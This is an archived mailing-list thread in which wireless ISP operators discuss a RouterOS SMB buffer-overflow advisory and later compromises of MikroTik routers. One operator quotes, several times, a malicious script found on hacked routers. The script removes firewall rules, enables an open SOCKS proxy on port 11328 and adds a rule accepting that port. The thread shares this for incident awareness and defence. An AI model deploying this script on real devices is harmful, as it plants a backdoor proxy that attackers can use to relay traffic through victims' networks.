*To:* mikrotik-users@wispa.org; memb...@wisp.org
*Subject:* [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

I have not tested this yet but

https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow

:: // Shawn Peppers

:: // DirectlinkAdmin.com 



___
Mikrotik-users mailing list
Mikrotik-users@wispa.org
http://lists.wispa.org/mailman/listinfo/mikrotik-users


--
Scott Reed
SBRConsulting, LLC
Network and Wireless Consulting
WISPA Vendor Member
IN UMC Associate Lay Leader
SLI Coach Trained



---
This email has been checked for viruses by AVG.
https://www.avg.com
___
Mikrotik-users mailing list
Mikrotik-users@wispa.org
http://lists.wispa.org/mailman/listinfo/mikrotik-users

Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

2018-08-05 Thread Shawn C. Peppers via Mikrotik-users

Been cleaning this up for random clients daily nowhence the reason i am 
very strongly voicing zero open ports (except l2tp and ipsec) to the outside 
network...  

:: // Shawn Peppers
:: // DirectlinkAdmin.com

> On Aug 5, 2018, at 7:57 PM, Bob Pensworth  wrote:
> 
> We are finding an IP/Socks connection:
> We are finding an event entry in System/Scheduler
> And the (below) script in System/Script:
>  
> /ip firewall filter remove [/ip firewall filter find where comment ~ "port 
> [0-9]*"];/ip socks set enabled=yes port=11328 max-connections=255 
> connection-idle-timeout=60;/ip socks access remove [/ip socks access 
> find];/ip firewall filter add chain=input protocol=tcp port=11328 
> action=accept comment="port 11328";/ip firewall filter move [/ip firewall 
> filter find comment="port 11328"] 1;
>  
> --
> Bob Pensworth, WA7BOB | General Manager
> CresComm WiFi, LLC | (360) 928-, x1
>  
> From: mikrotik-users-boun...@wispa.org  On 
> Behalf Of Shawn C. Peppers via Mikrotik-users
> Sent: Friday, March 16, 2018 11:54 AM
> To: mikrotik-users@wispa.org; memb...@wisp.org
> Subject: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27
>  
> I have not tested this yet but
>  
> https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow
> 
> :: // Shawn Peppers
> :: // DirectlinkAdmin.com
___
Mikrotik-users mailing list
Mikrotik-users@wispa.org
http://lists.wispa.org/mailman/listinfo/mikrotik-users

Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

2018-08-05 Thread Bruce Bridegwater via Mikrotik-users

Fyi, credit to J.P. Douros from RPM Provioning Management for bringing it to 
our attention and providing the solution.

RPM manages our Cisco UBR10k CMTS.

Great support company.

From: mikrotik-users-boun...@wispa.org  on 
behalf of Bob Pensworth via Mikrotik-users 
Sent: Sunday, August 5, 2018 7:57:53 PM
To: 'Shawn C. Peppers'; 'Mikrotik Users'
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

We are finding an IP/Socks connection:
We are finding an event entry in System/Scheduler
And the (below) script in System/Script:

/ip firewall filter remove [/ip firewall filter find where comment ~ "port 
[0-9]*"];/ip socks set enabled=yes port=11328 max-connections=255 
connection-idle-timeout=60;/ip socks access remove [/ip socks access find];/ip 
firewall filter add chain=input protocol=tcp port=11328 action=accept 
comment="port 11328";/ip firewall filter move [/ip firewall filter find 
comment="port 11328"] 1;

--
Bob Pensworth, WA7BOB | General Manager
CresComm WiFi, LLC<http://www.crescommwifi.com/> | (360) 928-, x1

From: mikrotik-users-boun...@wispa.org  On 
Behalf Of Shawn C. Peppers via Mikrotik-users
Sent: Friday, March 16, 2018 11:54 AM
To: mikrotik-users@wispa.org; memb...@wisp.org
Subject: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

I have not tested this yet but

https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow
:: // Shawn Peppers
:: // DirectlinkAdmin.com<http://DirectlinkAdmin.com>
___
Mikrotik-users mailing list
Mikrotik-users@wispa.org
http://lists.wispa.org/mailman/listinfo/mikrotik-users

Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

2018-08-05 Thread Bob Pensworth via Mikrotik-users

We are finding an IP/Socks connection:

We are finding an event entry in System/Scheduler

And the (below) script in System/Script:

 

/ip firewall filter remove [/ip firewall filter find where comment ~ "port 
[0-9]*"];/ip socks set enabled=yes port=11328 max-connections=255 
connection-idle-timeout=60;/ip socks access remove [/ip socks access find];/ip 
firewall filter add chain=input protocol=tcp port=11328 action=accept 
comment="port 11328";/ip firewall filter move [/ip firewall filter find 
comment="port 11328"] 1;

 

-- 

Bob Pensworth, WA7BOB | General Manager

  CresComm WiFi, LLC | (360) 928-, x1

 

From: mikrotik-users-boun...@wispa.org  On 
Behalf Of Shawn C. Peppers via Mikrotik-users
Sent: Friday, March 16, 2018 11:54 AM
To: mikrotik-users@wispa.org; memb...@wisp.org
Subject: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

 

I have not tested this yet but

 

https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow

:: // Shawn Peppers

:: // DirectlinkAdmin.com  

___
Mikrotik-users mailing list
Mikrotik-users@wispa.org
http://lists.wispa.org/mailman/listinfo/mikrotik-users

Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

2018-03-19 Thread Dennis Burgess via Mikrotik-users

Yes, but why would you enable SNB in MT ☺  lol.  I know people who do but 
still. .lol

Dennis Burgess
www.linktechs.net – 314-735-0270 x103 – 
dmburg...@linktechs.net

From: mikrotik-users-boun...@wispa.org 
[mailto:mikrotik-users-boun...@wispa.org] On Behalf Of Shawn C. Peppers via 
Mikrotik-users
Sent: Friday, March 16, 2018 1:54 PM
To: mikrotik-users@wispa.org; memb...@wisp.org
Subject: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

I have not tested this yet but

https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow
:: // Shawn Peppers
:: // DirectlinkAdmin.com
___
Mikrotik-users mailing list
Mikrotik-users@wispa.org
http://lists.wispa.org/mailman/listinfo/mikrotik-users

Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

2018-03-16 Thread Josh Luthman via Mikrotik-users

I really hate the whole SMB package on RouterOS if I'm honest.


Josh Luthman
Office: 937-552-2340
Direct: 937-552-2343
1100 Wayne St
Suite 1337
Troy, OH 45373

On Fri, Mar 16, 2018 at 3:13 PM, Lewis Bergman via Mikrotik-users <
mikrotik-users@wispa.org> wrote:

> I would hope few are using MT in that fashion.
>
> On Fri, Mar 16, 2018 at 1:53 PM Shawn C. Peppers via Mikrotik-users <
> mikrotik-users@wispa.org> wrote:
>
>> I have not tested this yet but
>>
>> https://www.coresecurity.com/advisories/mikrotik-routeros-
>> smb-buffer-overflow
>>
>> :: // Shawn Peppers
>> :: // DirectlinkAdmin.com
>> ___
>> Mikrotik-users mailing list
>> Mikrotik-users@wispa.org
>> http://lists.wispa.org/mailman/listinfo/mikrotik-users
>>
>
> ___
> Mikrotik-users mailing list
> Mikrotik-users@wispa.org
> http://lists.wispa.org/mailman/listinfo/mikrotik-users
>
>
___
Mikrotik-users mailing list
Mikrotik-users@wispa.org
http://lists.wispa.org/mailman/listinfo/mikrotik-users

Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

15 matches

Site Navigation

Mail list logo

Footer information